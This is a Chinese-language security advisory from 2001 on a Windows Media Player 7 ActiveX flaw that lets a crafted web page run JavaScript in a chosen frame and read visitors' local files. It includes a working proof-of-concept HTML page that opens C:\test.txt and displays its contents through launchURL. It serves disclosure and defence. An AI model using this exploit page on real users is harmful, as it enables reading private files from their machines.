Windows媒体播放器执行JavaScript URL的漏洞
发布日期:2001-01-04
更新日期:2001-01-04
受影响系统:
Microsoft Windows Media Player 7
- Microsoft Windows 98
- Microsoft Windows 95
- Microsoft Windows NT 4.0
- Microsoft Windows NT 2000
描述:
Windows媒体播放器是一个用于察看数字音频和视频内容的应用程序。它可以作为ActiveX
控件嵌入到Web页面中。
它存在一个漏洞,即有可能从嵌入在HTML中的Windows媒体播放器ActiveX控件中执行一个
JavaScript URL。该javascript可以在已经打开的任意frame中执行,这些frame在
ActiveX控件中指定。攻击者从而能够控制这些frame的DOM(Document Object Model),
绕过安全限制。这种攻击可以通过一个特殊构造的Web页面来完成,受害者访问该页面时就
会受到攻。
攻击者利用这个漏洞可以读取来访者的文件系统中的文件,据报道还可以在受害者的机器
上执行任意程序。
<*来源:Georgi Guninski (
guninski@guninski.com) *>
测试方法:
警 告
以下程序(方法)可能带有攻击性,仅供安全研究与教学之用。使用者风险自负!
Georgi Guninski 提供了如下测试代码:
--------wmp7ie.html------------------------------------------------
<object id="o1" classid="clsid:6BF52A52-394A-11D3-B153-00C04F79FAA6">
<PARAM NAME="defaultFrame" value="georgi">
</object>
<SCRIPT>
alert("This page reads C:\\test.txt");
window.open("file://c:/test.txt","georgi");
function f()
{
document.o1.object.launchURL("javascript:alert(document.body.innerText)");
}
setTimeout("f()",1000);
</SCRIPT>
---------------------------------------------------------------------
建议:
临时解决办法:
禁止执行Active 脚本
厂商补丁:
暂无。
浏览次数:4604
严重程度:0(网友投票)